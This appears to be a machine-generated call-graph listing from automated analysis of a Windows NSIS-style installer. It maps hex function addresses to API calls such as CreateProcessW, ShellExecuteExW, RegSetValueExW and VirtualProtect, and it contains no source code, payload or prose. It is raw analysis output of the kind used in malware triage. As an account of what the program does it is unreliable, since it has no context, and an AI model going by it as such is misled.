4003->4004 4005 405bab lstrcatW 4003->4005 4004->3899 4005->4004 4006->3959 4008 405c57 4007->4008 4009 405c69 4007->4009 4008->4009 4010 405c64 CharNextW 4008->4010 4011 405c8d 4009->4011 4012 405bbc CharNextW 4009->4012 4010->4011 4011->3962 4011->3963 4012->4009 4014 405990 4013->4014 4015 405d9d SetFileAttributesW 4013->4015 4014->3980 4014->3981 4014->3982 4015->4014 4017 405f36 4016->4017 4018 405f5c GetShortPathNameW 4016->4018 4043 405db0 GetFileAttributesW CreateFileW 4017->4043 4020 405f71 4018->4020 4021 40607b 4018->4021 4020->4021 4023 405f79 wsprintfA 4020->4023 4021->3999 4022 405f40 CloseHandle GetShortPathNameW 4022->4021 4024 405f54 4022->4024 4025 4062dc 17 API calls 4023->4025 4024->4018 4024->4021 4026 405fa1 4025->4026 4044 405db0 GetFileAttributesW CreateFileW 4026->4044 4028 405fae 4028->4021 4029 405fbd GetFileSize GlobalAlloc 4028->4029 4030 406074 CloseHandle 4029->4030 4031 405fdf 4029->4031 4030->4021 4045 405e33 ReadFile 4031->4045 4036 406012 4038 405d15 4 API calls 4036->4038 4037 405ffe lstrcpyA 4039 406020 4037->4039 4038->4039 4040 406057 SetFilePointer 4039->4040 4052 405e62 WriteFile 4040->4052 4043->4022 4044->4028 4046 405e51 4045->4046 4046->4030 4047 405d15 lstrlenA 4046->4047 4048 405d56 lstrlenA 4047->4048 4049 405d2f lstrcmpiA 4048->4049 4051 405d5e 4048->4051 4050 405d4d CharNextA 4049->4050 4049->4051 4050->4048 4051->4036 4051->4037 4053 405e80 GlobalFree 4052->4053 4053->4030 4054 4015c1 4055 402c41 17 API calls 4054->4055 4056 4015c8 4055->4056 4057 405c3a 4 API calls 4056->4057 4071 4015d1 4057->4071 4058 401631 4060 401636 4058->4060 4062 401663 4058->4062 4059 405bbc CharNextW 4059->4071 4081 401423 4060->4081 4063 401423 24 API calls 4062->4063 4070 40165b 4063->4070 4068 40164a SetCurrentDirectoryW 4068->4070 4069 401617 GetFileAttributesW 4069->4071 4071->4058 4071->4059 4071->4069 4073 40588b 4071->4073 4076 4057f1 CreateDirectoryW 4071->4076 4085 40586e CreateDirectoryW 4071->4085 4088 406694 GetModuleHandleA 4073->4088 4077 405842 GetLastError 4076->4077 4078 40583e 4076->4078 4077->4078 4079 405851 SetFileSecurityW 4077->4079 4078->4071 4079->4078 4080 405867 GetLastError 4079->4080 4080->4078 4082 405322 24 API calls 4081->4082 4083 401431 4082->4083 4084 4062ba lstrcpynW 4083->4084 4084->4068 4086 405882 GetLastError 4085->4086 4087 40587e 4085->4087 4086->4087 4087->4071 4089 4066b0 4088->4089 4090 4066ba GetProcAddress 4088->4090 4094 406624 GetSystemDirectoryW 4089->4094 4092 405892 4090->4092 4092->4071 4093 4066b6 4093->4090 4093->4092 4095 406646 wsprintfW LoadLibraryExW 4094->4095 4095->4093 4182 70122997 4183 701229e7 4182->4183 4184 701229a7 VirtualProtect 4182->4184 4184->4183 4214 401e49 4215 402c1f 17 API calls 4214->4215 4216 401e4f 4215->4216 4217 402c1f 17 API calls 4216->4217 4218 401e5b 4217->4218 4219 401e72 EnableWindow 4218->4219 4220 401e67 ShowWindow 4218->4220 4221 402ac5 4219->4221 4220->4221 4222 40264a 4223 402c1f 17 API calls 4222->4223 4224 402659 4223->4224 4225 4026a3 ReadFile 4224->4225 4226 405e33 ReadFile 4224->4226 4227 4026e3 MultiByteToWideChar 4224->4227 4228 402798 4224->4228 4231 40273c 4224->4231 4232 402709 SetFilePointer MultiByteToWideChar 4224->4232 4233 4027a9 4224->4233 4235 402796 4224->4235 4225->4224 4225->4235 4226->4224 4227->4224 4245 406201 wsprintfW 4228->4245 4231->4224 4231->4235 4236 405e91 SetFilePointer 4231->4236 4232->4224 4234 4027ca SetFilePointer 4233->4234 4233->4235 4234->4235 4237 405ec5 4236->4237 4238 405ead 4236->4238 4237->4231 4239 405e33 ReadFile 4238->4239 4240 405eb9 4239->4240 4240->4237 4241 405ef6 SetFilePointer 4240->4241 4242 405ece SetFilePointer 4240->4242 4241->4237 4242->4241 4243 405ed9 4242->4243 4244 405e62 WriteFile 4243->4244 4244->4237 4245->4235 4968 4016cc 4969 402c41 17 API calls 4968->4969 4970 4016d2 GetFullPathNameW 4969->4970 4973 4016ec 4970->4973 4977 40170e 4970->4977 4971 401723 GetShortPathNameW 4972 402ac5 4971->4972 4974 4065fd 2 API calls 4973->4974 4973->4977 4975 4016fe 4974->4975 4975->4977 4978 4062ba lstrcpynW 4975->4978 4977->4971 4977->4972 4978->4977 4256 40234e 4257 402c41 17 API calls 4256->4257 4258 40235d 4257->4258 4259 402c41 17 API calls 4258->4259 4260 402366 4259->4260 4261 402c41 17 API calls 4260->4261 4262 402370 GetPrivateProfileStringW 4261->4262 4979 70122301 4980 7012236b 4979->4980 4981 70122376 GlobalAlloc 4980->4981 4982 70122395 4980->4982 4981->4980 4983 401b53 4984 402c41 17 API calls 4983->4984 4985 401b5a 4984->4985 4986 402c1f 17 API calls 4985->4986 4987 401b63 wsprintfW 4986->4987 4988 402ac5 4987->4988 4989 401956 4990 402c41 17 API calls 4989->4990 4991 40195d lstrlenW 4990->4991 4992 402592 4991->4992 4993 4014d7 4994 402c1f 17 API calls 4993->4994 4995 4014dd Sleep 4994->4995 4997 402ac5 4995->4997 4795 403d58 4796 403d70 4795->4796 4797 403eab 4795->4797 4796->4797 4798 403d7c 4796->4798 4799 403efc 4797->4799 4800 403ebc GetDlgItem GetDlgItem 4797->4800 4802 403d87 SetWindowPos 4798->4802 4803 403d9a 4798->4803 4801 403f56 4799->4801 4809 401389 2 API calls 4799->4809 4804 404231 18 API calls 4800->4804 4805 40427d SendMessageW 4801->4805 4826 403ea6 4801->4826 4802->4803 4806 403db7 4803->4806 4807 403d9f ShowWindow 4803->4807 4808 403ee6 SetClassLongW 4804->4808 4834 403f68 4805->4834 4810 403dd9 4806->4810 4811 403dbf DestroyWindow 4806->4811 4807->4806 4812 40140b 2 API calls 4808->4812 4813 403f2e 4809->4813 4815 403dde SetWindowLongW 4810->4815 4816 403def 4810->4816 4814 4041db 4811->4814 4812->4799 4813->4801 4819 403f32 SendMessageW 4813->4819 4825 4041eb ShowWindow 4814->4825 4814->4826 4815->4826 4817 403e98 4816->4817 4818 403dfb GetDlgItem 4816->4818 4876 404298 4817->4876 4822 403e2b 4818->4822 4823 403e0e SendMessageW IsWindowEnabled 4818->4823 4819->4826 4820 40140b 2 API calls 4820->4834 4821 4041bc DestroyWindow EndDialog 4821->4814 4828 403e38 4822->4828 4830 403e7f SendMessageW 4822->4830 4831 403e4b 4822->4831 4840 403e30 4822->4840 4823->4822 4823->4826 4825->4826 4827 4062dc 17 API calls 4827->4834 4828->4830 4828->4840 4829 404231 18 API calls 4829->4834 4830->4817 4835 403e53 4831->4835 4836 403e68 4831->4836 4833 403e66 4833->4817 4834->4820 4834->4821 4834->4826 4834->4827 4834->4829 4857 4040fc DestroyWindow 4834->4857 4867 404231 4834->4867 4838 40140b 2 API calls 4835->4838 4837 40140b 2 API calls 4836->4837 4839 403e6f 4837->4839 4838->4840 4839->4817 4839->4840 4873 40420a 4840->4873 4842 403fe3 GetDlgItem 4843 404000 ShowWindow KiUserCallbackDispatcher 4842->4843 4844 403ff8 4842->4844 4870 404253 EnableWindow 4843->4870 4844->4843 4846 40402a EnableWindow 4850 40403e 4846->4850 4847 404043 GetSystemMenu EnableMenuItem SendMessageW 4848 404073 SendMessageW 4847->4848 4847->4850 4848->4850 4850->4847 4851 403d39 18 API calls 4850->4851 4871 404266 SendMessageW 4850->4871 4872 4062ba lstrcpynW 4850->4872 4851->4850 4853 4040a2 lstrlenW 4854 4062dc 17 API calls 4853->4854 4855 4040b8 SetWindowTextW 4854->4855 4856 401389 2 API calls 4855->4856 4856->4834 4857->4814 4858 404116 CreateDialogParamW 4857->4858 4858->4814 4859 404149 4858->4859 4860 404231 18 API calls 4859->4860 4861 404154 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4860->4861 4862 401389 2 API calls 4861->4862 4863 40419a 4862->4863 4863->4826 4864 4041a2 ShowWindow 4863->4864 4865 40427d SendMessageW 4864->4865 4866 4041ba 4865->4866 4866->4814 4868 4062dc 17 API calls 4867->4868 4869 40423c SetDlgItemTextW 4868->4869 4869->4842 4870->4846 4871->4850 4872->4853 4874 404211 4873->4874 4875 404217 SendMessageW 4873->4875 4874->4875 4875->4833 4877 40435b 4876->4877 4878 4042b0 GetWindowLongW 4876->4878 4877->4826 4878->4877 4879 4042c5 4878->4879 4879->4877 4880 4042f2 GetSysColor 4879->4880 4881 4042f5 4879->4881 4880->4881 4882 404305 SetBkMode 4881->4882 4883 4042fb SetTextColor 4881->4883 4884 404323 4882->4884 4885 40431d GetSysColor 4882->4885 4883->4882 4886 404334 4884->4886 4887 40432a SetBkColor 4884->4887 4885->4884 4886->4877 4888 404347 DeleteObject 4886->4888 4889 40434e CreateBrushIndirect 4886->4889 4887->4886 4888->4889 4889->4877 4998 401f58 4999 402c41 17 API calls 4998->4999 5000 401f5f 4999->5000 5001 4065fd 2 API calls 5000->5001 5002 401f65 5001->5002 5004 401f76 5002->5004 5005 406201 wsprintfW 5002->5005 5005->5004 5006 402259 5007 402c41 17 API calls 5006->5007 5008 40225f 5007->5008 5009 402c41 17 API calls 5008->5009 5010 402268 5009->5010 5011 402c41 17 API calls 5010->5011 5012 402271 5011->5012 5013 4065fd 2 API calls 5012->5013 5014 40227a 5013->5014 5015 40228b lstrlenW lstrlenW 5014->5015 5016 40227e 5014->5016 5018 405322 24 API calls 5015->5018 5017 405322 24 API calls 5016->5017 5020 402286 5017->5020 5019 4022c9 SHFileOperationW 5018->5019 5019->5016 5019->5020 5021 4046db 5022 404711 5021->5022 5023 4046eb 5021->5023 5025 404298 8 API calls 5022->5025 5024 404231 18 API calls 5023->5024 5026 4046f8 SetDlgItemTextW 5024->5026 5027 40471d 5025->5027 5026->5022 4890 40175c 4891 402c41 17 API calls 4890->4891 4892 401763 4891->4892 4893 405ddf 2 API calls 4892->4893 4894 40176a 4893->4894 4895 405ddf 2 API calls 4894->4895 4895->4894 5028 4022dd 5029 4022f7 5028->5029 5030 4022e4 5028->5030 5031 4062dc 17 API calls 5030->5031 5032 4022f1 5031->5032 5033 405920 MessageBoxIndirectW 5032->5033 5033->5029 5034 4028dd 5056 405db0 GetFileAttributesW CreateFileW 5034->5056 5036 4028e4 5037 4028f0 GlobalAlloc 5036->5037 5038 402987 5036->5038 5041 402909 5037->5041 5042 40297e CloseHandle 5037->5042 5039 4029a2 5038->5039 5040 40298f DeleteFileW 5038->5040 5040->5039 5057 403347 SetFilePointer 5041->5057 5042->5038 5044 40290f 5045 403331 ReadFile 5044->5045 5046 402918 GlobalAlloc 5045->5046 5047 402928 5046->5047 5048 40295c 5046->5048 5049 403116 31 API calls 5047->5049 5050 405e62 WriteFile 5048->5050 5055 402935 5049->5055 5051 402968 GlobalFree 5050->5051 5052 403116 31 API calls 5051->5052 5053 40297b 5052->5053 5053->5042 5054 402953 GlobalFree 5054->5048 5055->5054 5056->5036 5057->5044 5058 401d5d GetDlgItem GetClientRect 5059 402c41 17 API calls 5058->5059 5060 401d8f LoadImageW SendMessageW 5059->5060 5061 401dad DeleteObject 5060->5061 5062 402ac5 5060->5062 5061->5062 5063 405461 5064 405482 GetDlgItem GetDlgItem GetDlgItem 5063->5064 5065 40560b 5063->5065 5108 404266 SendMessageW 5064->5108 5067 405614 GetDlgItem CreateThread CloseHandle 5065->5067 5068 40563c 5065->5068 5067->5068 5070 405667 5068->5070 5071 405653 ShowWindow ShowWindow 5068->5071 5072 40568c 5068->5072 5069 4054f2 5077 4054f9 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5069->5077 5074 4056a1 ShowWindow 5070->5074 5075 40567b 5070->5075 5078 4056c7 5070->5078 5110 404266 SendMessageW 5071->5110 5076 404298 8 API calls 5072->5076 5081 4056c1 5074->5081 5082 4056b3 5074->5082 5079 40420a SendMessageW 5075->5079 5080 40569a 5076->5080 5083 405567 5077->5083 5084 40554b SendMessageW SendMessageW 5077->5084 5078->5072 5085 4056d5 SendMessageW 5078->5085 5079->5072 5090 40420a SendMessageW 5081->5090 5089 405322 24 API calls 5082->5089 5086 40557a 5083->5086 5087 40556c SendMessageW 5083->5087 5084->5083 5085->5080 5088 4056ee CreatePopupMenu 5085->5088 5092 404231 18 API calls 5086->5092 5087->5086 5091 4062dc 17 API calls 5088->5091 5089->5081 5090->5078 5093 4056fe AppendMenuW 5091->5093 5094 40558a 5092->5094 5095 40571b GetWindowRect 5093->5095 5096 40572e TrackPopupMenu 5093->5096 5097 405593 ShowWindow 5094->5097 5098 4055c7 GetDlgItem SendMessageW 5094->5098 5095->5096 5096->5080 5099 405749 5096->5099 5100 4055b6 5097->5100 5101 4055a9 ShowWindow 5097->5101 5098->5080 5102 4055ee SendMessageW SendMessageW 5098->5102 5103 405765 SendMessageW 5099->5103 5109 404266 SendMessageW 5100->5109 5101->5100 5102->5080 5103->5103 5104 405782 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5103->5104 5106 4057a7 SendMessageW 5104->5106 5106->5106 5107 4057d0 GlobalUnlock SetClipboardData CloseClipboard 5106->5107 5107->5080 5108->5069 5109->5098 5110->5070 5111 401563 5112 402a6b 5111->5112 5115 406201 wsprintfW 5112->5115 5114 402a70 5115->5114 4097 4023e4 4098 402c41 17 API calls 4097->4098 4099 4023f6 4098->4099 4100 402c41 17 API calls 4099->4100 4101 402400 4100->4101 4114 402cd1 4101->4114 4104 402438 4111 402444 4104->4111 4118 402c1f 4104->4118 4105 40288b 4106 402c41 17 API calls 4107 40242e lstrlenW 4106->4107 4107->4104 4109 402463 RegSetValueExW 4110 402479 RegCloseKey 4109->4110 4110->4105 4111->4109 4121 403116 4111->4121 4115 402cec 4114->4115 4141 406155 4115->4141 4119 4062dc 17 API calls 4118->4119 4120 402c34 4119->4120 4120->4111 4122 40312f 4121->4122 4123 40315d 4122->4123 4148 403347 SetFilePointer 4122->4148 4145 403331 4123->4145 4127 4032ca 4129 40330c 4127->4129 4133 4032ce 4127->4133 4128 40317a GetTickCount 4135 4032b4 4128->4135 4140 4031c9 4128->4140 4130 403331 ReadFile 4129->4130 4130->4135 4131 403331 ReadFile 4131->4140 4132 403331 ReadFile 4132->4133 4133->4132 4134 405e62 WriteFile 4133->4134 4133->4135 4134->4133 4135->4109 4136 40321f GetTickCount 4136->4140 4137 403244 MulDiv wsprintfW 4138 405322 24 API calls 4137->4138 4138->4140 4139 405e62 WriteFile 4139->4140 4140->4131 4140->4135 4140->4136 4140->4137 4140->4139 4142 406164 4141->4142 4143 402410 4142->4143 4144 40616f RegCreateKeyExW 4142->4144 4143->4104 4143->4105 4143->4106 4144->4143 4146 405e33 ReadFile 4145->4146 4147 403168 4146->4147 4147->4127 4147->4128 4147->4135 4148->4123 4185 4058e6 ShellExecuteExW 5116 404367 lstrcpynW lstrlenW 5117 402868 5118 402c41 17 API calls 5117->5118 5119 40286f FindFirstFileW 5118->5119 5120 402882 5119->5120 5121 402897 5119->5121 5125 406201 wsprintfW 5121->5125 5123 4028a0 5126 4062ba lstrcpynW 5123->5126 5125->5123 5126->5120 5127 401968 5128 402c1f 17 API calls 5127->5128 5129 40196f 5128->5129 5130 402c1f 17 API calls 5129->5130 5131 40197c 5130->5131 5132 402c41 17 API calls 5131->5132 5133 401993 lstrlenW 5132->5133 5134 4019a4 5133->5134 5135 4019e5 5134->5135 5139 4062ba lstrcpynW 5134->5139 5137 4019d5 5137->5135 5138 4019da lstrlenW 5137->5138 5138->5135 5139->5137 5140 403968 5141 403973 5140->5141 5142 403977 5141->5142 5143 40397a GlobalAlloc 5141->5143 5143->5142 5144 40166a 5145 402c41 17 API calls 5144->5145 5146 401670 5145->5146 5147 4065fd 2 API calls 5146->5147 5148 401676 5147->5148 4263 4027ef 4264 4027f6 4263->4264 4265 402a70 4263->4265 4266 402c1f 17 API calls 4264->4266 4267 4027fd 4266->4267 4268 40280c SetFilePointer 4267->4268 4268->4265 4269 40281c 4268->4269 4271 406201 wsprintfW 4269->4271 4271->4265 4272 40176f 4273 402c41 17 API calls 4272->4273 4274 401776 4273->4274 4275 401796 4274->4275 4276 40179e 4274->4276 4312 4062ba lstrcpynW 4275->4312 4313 4062ba lstrcpynW 4276->4313 4279 4017a9 4281 405b8f 3 API calls 4279->4281 4280 40179c 4283 40654e 5 API calls 4280->4283 4282 4017af lstrcatW 4281->4282 4282->4280 4299 4017bb 4283->4299 4284 4065fd 2 API calls 4284->4299 4285 4017f7 4286 405d8b 2 API calls 4285->4286 4286->4299 4288 4017cd CompareFileTime 4288->4299 4289 40188d 4290 405322 24 API calls 4289->4290 4293 401897 4290->4293 4291 405322 24 API calls 4301 401879 4291->4301 4292 4062ba lstrcpynW 4292->4299 4294 403116 31 API calls 4293->4294 4295 4018aa 4294->4295 4296 4018be SetFileTime 4295->4296 4298 4018d0 CloseHandle 4295->4298 4296->4298 4297 4062dc 17 API calls 4297->4299 4300 4018e1 4298->4300 4298->4301 4299->4284 4299->4285 4299->4288 4299->4289 4299->4292 4299->4297 4310 401864 4299->4310 4311 405db0 GetFileAttributesW CreateFileW 4299->4311 4314 405920 4299->4314 4302 4018e6 4300->4302 4303 4018f9 4300->4303 4305 4062dc 17 API calls 4302->4305 4304 4062dc 17 API calls 4303->4304 4307 401901 4304->4307 4306 4018ee lstrcatW 4305->4306 4306->4307 4309 405920 MessageBoxIndirectW 4307->4309 4309->4301 4310->4291 4310->4301 4311->4299 4312->4280 4313->4279 4315 405935 4314->4315 4316 405949 MessageBoxIndirectW 4315->4316 4317 405981 4315->4317 4316->4317 4317->4299 5149 7012103d 5152 7012101b 5149->5152 5159 70121516 5152->5159 5154 70121020 5155 70121027 GlobalAlloc 5154->5155 5156 70121024 5154->5156 5155->5156 5157 7012153d 3 API calls 5156->5157 5158 7012103b 5157->5158 5160 7012151c 5159->5160 5161 70121522 5160->5161 5162 7012152e GlobalFree 5160->5162 5161->5154 5162->5154 5163 4043f0 5164 404522 5163->5164 5165 404408 5163->5165 5166 40458c 5164->5166 5170 404656 5164->5170 5173 40455d GetDlgItem SendMessageW 5164->5173 5169 404231 18 API calls 5165->5169 5167 404596 GetDlgItem 5166->5167 5166->5170 5168 404617 5167->5168 5172 4045b0 5167->5172 5168->5170 5178 404629 5168->5178 5174 40446f 5169->5174 5171 404298 8 API calls 5170->5171 5176 404651 5171->5176 5172->5168 5177 4045d6 SendMessageW LoadCursorW SetCursor 5172->5177 5196 404253 EnableWindow 5173->5196 5175 404231 18 API calls 5174->5175 5180 40447c CheckDlgButton 5175->5180 5200 40469f 5177->5200 5182 40463f 5178->5182 5183 40462f SendMessageW 5178->5183 5194 404253 EnableWindow 5180->5194 5182->5176 5187 404645 SendMessageW 5182->5187 5183->5182 5184 404587 5197 40467b 5184->5197 5187->5176 5189 40449a GetDlgItem 5195 404266 SendMessageW 5189->5195 5191 4044b0 SendMessageW 5192 4044d6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5191->5192 5193 4044cd GetSysColor 5191->5193 5192->5176 5193->5192 5194->5189 5195->5191 5196->5184 5198 404689 5197->5198 5199 40468e SendMessageW 5197->5199 5198->5199 5199->5166 5203 4058e6 ShellExecuteExW 5200->5203 5202 404605 LoadCursorW SetCursor 5202->5168 5203->5202 5204 401a72 5205 402c1f 17 API calls 5204->5205 5206 401a7b 5205->5206 5207 402c1f 17 API calls 5206->5207 5208 401a20 5207->5208 5209 401cf3 5210 402c1f 17 API calls 5209->5210 5211 401cf9 IsWindow 5210->5211 5212 401a20 5211->5212 5213 401573 5214 401583 ShowWindow 5213->5214 5215 40158c 5213->5215 5214->5215 5216 402ac5 5215->5216 5217 40159a ShowWindow 5215->5217 5217->5216 5218 402df3 5219 402e05 SetTimer 5218->5219 5220 402e1e 5218->5220 5219->5220 5221 402e73 5220->5221 5222 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5220->5222 5222->5221 5223 4014f5 SetForegroundWindow 5224 402ac5 5223->5224 5225 402576 5226 402c41 17 API calls 5225->5226 5227 40257d 5226->5227 5230 405db0 GetFileAttributesW CreateFileW 5227->5230 5229 402589 5230->5229 5231 401b77 5232 401b84 5231->5232 5233 401bc8 5231->5233 5238 401b9b 5232->5238 5241 401c0d 5232->5241 5234 401bf2 GlobalAlloc 5233->5234 5235 401bcd 5233->5235 5237 4062dc 17 API calls 5234->5237 5245 4022f7 5235->5245 5252 4062ba lstrcpynW 5235->5252 5236 4062dc 17 API calls 5239 4022f1 5236->5239 5237->5241 5250 4062ba lstrcpynW 5238->5250 5246 405920 MessageBoxIndirectW 5239->5246 5241->5236 5241->5245 5243 401bdf GlobalFree 5243->5245 5244 401baa 5251 4062ba lstrcpynW 5244->5251 5246->5245 5248 401bb9 5253 4062ba lstrcpynW 5248->5253 5250->5244 5251->5248 5252->5243 5253->5245 5254 404a78 5255 404aa4 5254->5255 5256 404a88 5254->5256 5258 404ad7 5255->5258 5259 404aaa SHGetPathFromIDListW 5255->5259 5265 405904 GetDlgItemTextW 5256->5265 5261 404ac1 SendMessageW 5259->5261 5262 404aba 5259->5262 5260 404a95 SendMessageW 5260->5255 5261->5258 5264 40140b 2 API calls 5262->5264 5264->5261 5265->5260 5266 4024f8 5267 402c81 17 API calls 5266->5267 5268 402502 5267->5268 5269 402c1f 17 API calls 5268->5269 5270 40250b 5269->5270 5271 402533 RegEnumValueW 5270->5271 5272 402527 RegEnumKeyW 5270->5272 5273 40288b 5270->5273 5274 402548 RegCloseKey 5271->5274 5272->5274 5274->5273 5276 40167b 5277 402c41 17 API calls 5276->5277 5278 401682 5277->5278 5279 402c41 17 API calls 5278->5279 5280 40168b 5279->5280 5281 402c41 17 API calls 5280->5281 5282 401694 MoveFileW 5281->5282 5283 4016a0 5282->5283 5284 4016a7 5282->5284 5285 401423 24 API calls 5283->5285 5286 4065fd 2 API calls 5284->5286 5288 402250 5284->5288 5285->5288 5287 4016b6 5286->5287 5287->5288 5289 406080 36 API calls 5287->5289 5289->5283 5290 401e7d 5291 402c41 17 API calls 5290->5291 5292 401e83 5291->5292 5293 402c41 17 API calls 5292->5293 5294 401e8c 5293->5294 5295 402c41 17 API calls 5294->5295 5296 401e95 5295->5296 5297 402c41 17 API calls 5296->5297 5298 401e9e 5297->5298 5299 401423 24 API calls 5298->5299 5300 401ea5 5299->5300 5307 4058e6 ShellExecuteExW 5300->5307 5302 401ee7 5303 406745 5 API calls 5302->5303 5304 40288b 5302->5304 5305 401f01 CloseHandle 5303->5305 5305->5304 5307->5302 5308 4019ff 5309 402c41 17 API calls 5308->5309 5310 401a06 5309->5310 5311 402c41 17 API calls 5310->5311 5312 401a0f 5311->5312 5313 401a16 lstrcmpiW 5312->5313 5314 401a28 lstrcmpW 5312->5314 5315 401a1c 5313->5315 5314->5315 5316 401000 5317 401037 BeginPaint GetClientRect 5316->5317 5318 40100c DefWindowProcW 5316->5318 5319 4010f3 5317->5319 5321 401179 5318->5321 5322 401073 CreateBrushIndirect FillRect DeleteObject 5319->5322 5323 4010fc 5319->5323 5322->5319 5324 401102 CreateFontIndirectW 5323->5324 5325 401167 EndPaint 5323->5325 5324->5325 5326 401112 6 API calls 5324->5326 5325->5321 5326->5325 5327 401503 5328 40150b 5327->5328 5330 40151e 5327->5330 5329 402c1f 17 API calls 5328->5329 5329->5330 4149 402104 4150 402c41 17 API calls 4149->4150 4151 40210b 4150->4151 4152 402c41 17 API calls 4151->4152 4153 402115 4152->4153 4154 402c41 17 API calls 4153->4154 4155 40211f 4154->4155 4156 402c41 17 API calls 4155->4156 4157 402129 4156->4157 4158 402c41 17 API calls 4157->4158 4159 402133 4158->4159 4160 402172 CoCreateInstance 4159->4160 4161 402c41 17 API calls 4159->4161 4164 402191 4160->4164 4161->4160 4162 401423 24 API calls 4163 402250 4162->4163 4164->4162 4164->4163 4165 402484 4176 402c81 4165->4176 4168 402c41 17 API calls 4169 402497 4168->4169 4170 4024a2 RegQueryValueExW 4169->4170 4175 40288b 4169->4175 4171 4024c8 RegCloseKey 4170->4171 4172 4024c2 4170->4172 4171->4175 4172->4171 4181 406201 wsprintfW 4172->4181 4177 402c41 17 API calls 4176->4177 4178 402c98 4177->4178 4179 406127 RegOpenKeyExW 4178->4179 4180 40248e 4179->4180 4180->4168 4181->4171 4186 401f06 4187 402c41 17 API calls 4186->4187 4188 401f0c 4187->4188 4189 405322 24 API calls 4188->4189 4190 401f16 4189->4190 4201 4058a3 CreateProcessW 4190->4201 4193 401f3f CloseHandle 4196 40288b 4193->4196 4197 401f31 4198 401f41 4197->4198 4199 401f36 4197->4199 4198->4193 4209 406201 wsprintfW 4199->4209 4202 401f1c 4201->4202 4203 4058d6 CloseHandle 4201->4203 4202->4193 4202->4196 4204 406745 WaitForSingleObject 4202->4204 4203->4202 4205 40675f 4204->4205 4206 406771 GetExitCodeProcess 4205->4206 4210 4066d0 4205->4210 4206->4197 4209->4193 4211 4066ed PeekMessageW 4210->4211 4212 4066e3 DispatchMessageW 4211->4212 4213 4066fd WaitForSingleObject 4211->4213 4212->4211 4213->4205 5331 70121058 5333 70121074 5331->5333 5332 701210dd 5333->5332 5334 70121516 GlobalFree 5333->5334 5335 70121092 5333->5335 5334->5335 5336 70121516 GlobalFree 5335->5336 5337 701210a2 5336->5337 5338 701210b2 5337->5338 5339 701210a9 GlobalSize 5337->5339 5340 701210b6 GlobalAlloc 5338->5340 5341 701210c7 5338->5341 5339->5338 5342 7012153d 3 API calls 5340->5342 5343 701210d2 GlobalFree 5341->5343 5342->5341 5343->5332 5344 701216d8 5345 70121707 5344->5345 5346 70121b63 22 API calls 5345->5346 5347 7012170e 5346->5347 5348 70121721 5347->5348 5349 70121715 5347->5349 5351 7012172b 5348->5351 5352 70121748 5348->5352 5350 70121272 2 API calls 5349->5350 5353 7012171f 5350->5353 5354 7012153d 3 API calls 5351->5354 5355 70121772 5352->5355 5356 7012174e 5352->5356 5358 70121730 5354->5358 5357 7012153d 3 API calls 5355->5357 5359 701215b4 2 API calls 5356->5359 5357->5353 5361 701215b4 2 API calls 5358->5361 5360 70121753 5359->5360 5362 70121272 2 API calls 5360->5362 5363 70121736 5361->5363 5364 70121759 GlobalFree 5362->5364 5365 70121272 2 API calls 5363->5365 5364->5353 5366 7012176d GlobalFree 5364->5366 5367 7012173c GlobalFree 5365->5367 5366->5353 5367->5353 4246 40230c 4247 402314 4246->4247 4248 40231a 4246->4248 4249 402c41 17 API calls 4247->4249 4250 402c41 17 API calls 4248->4250 4252 402328 4248->4252 4249->4248 4250->4252 4251 402336 4254 402c41 17 API calls 4251->4254 4252->4251 4253 402c41 17 API calls 4252->4253 4253->4251 4255 40233f WritePrivateProfileStringW 4254->4255 5368 40190c 5369 401943 5368->5369 5370 402c41 17 API calls 5369->5370 5371 401948 5370->5371 5372 4059cc 67 API calls 5371->5372 5373 401951 5372->5373 5374 401f8c 5375 402c41 17 API calls 5374->5375 5376 401f93 5375->5376 5377 406694 5 API calls 5376->5377 5378 401fa2 5377->5378 5379 402026 5378->5379 5380 401fbe GlobalAlloc 5378->5380 5380->5379 5381 401fd2 5380->5381 5382 406694 5 API calls 5381->5382 5383 401fd9 5382->5383 5384 406694 5 API calls 5383->5384 5385 401fe3 5384->5385 5385->5379 5389 406201 wsprintfW 5385->5389 5387 402018 5390 406201 wsprintfW 5387->5390 5389->5387 5390->5379 5391 40238e 5392 4023c1 5391->5392 5393 402396 5391->5393 5395 402c41 17 API calls 5392->5395 5394 402c81 17 API calls 5393->5394 5397 40239d 5394->5397 5396 4023c8 5395->5396 5402 402cff 5396->5402 5399 402c41 17 API calls 5397->5399 5400 4023d5 5397->5400 5401 4023ae RegDeleteValueW RegCloseKey 5399->5401 5401->5400 5403 402d13 5402->5403 5404 402d0c 5402->5404 5403->5404 5406 402d44 5403->5406 5404->5400 5407 406127 RegOpenKeyExW 5406->5407 5409 402d72 5407->5409 5408 402d98 RegEnumKeyW 5408->5409 5410 402daf RegCloseKey 5408->5410 5409->5408 5409->5410 5411 402dd0 RegCloseKey 5409->5411 5413 402d44 6 API calls 5409->5413 5416 402dc3 5409->5416 5412 406694 5 API calls 5410->5412 5411->5416 5414 402dbf 5412->5414 5413->5409 5415 402de0 RegDeleteKeyW 5414->5415 5414->5416 5415->5416 5416->5404 4318 40338f SetErrorMode GetVersion 4319 4033ce 4318->4319 4320 4033d4 4318->4320 4321 406694 5 API calls 4319->4321 4322 406624 3 API calls 4320->4322 4321->4320 4323 4033ea lstrlenA 4322->4323 4323->4320 4324 4033fa 4323->4324 4325 406694 5 API calls 4324->4325 4326 403401 4325->4326 4327 406694 5 API calls 4326->4327 4328 403408 4327->4328 4329 406694 5 API calls 4328->4329 4330 403414 #17 OleInitialize SHGetFileInfoW 4329->4330 4408 4062ba lstrcpynW 4330->4408 4333 403460 GetCommandLineW 4409 4062ba lstrcpynW 4333->4409 4335 403472 4336 405bbc CharNextW 4335->4336 4337 403497 CharNextW 4336->4337 4338 4035c1 GetTempPathW 4337->4338 4348 4034b0 4337->4348 4410 40335e 4338->4410 4340 4035d9 4341 403633 DeleteFileW 4340->4341 4342 4035dd GetWindowsDirectoryW lstrcatW 4340->4342 4420 402edd GetTickCount GetModuleFileNameW 4341->4420 4343 40335e 12 API calls 4342->4343 4346 4035f9 4343->4346 4344 405bbc CharNextW 4344->4348 4346->4341 4349 4035fd GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4346->4349 4347 403647 4354 405bbc CharNextW 4347->4354 4390 4036ea 4347->4390 4403 4036fa 4347->4403 4348->4344 4351 4035ac 4348->4351 4353 4035aa 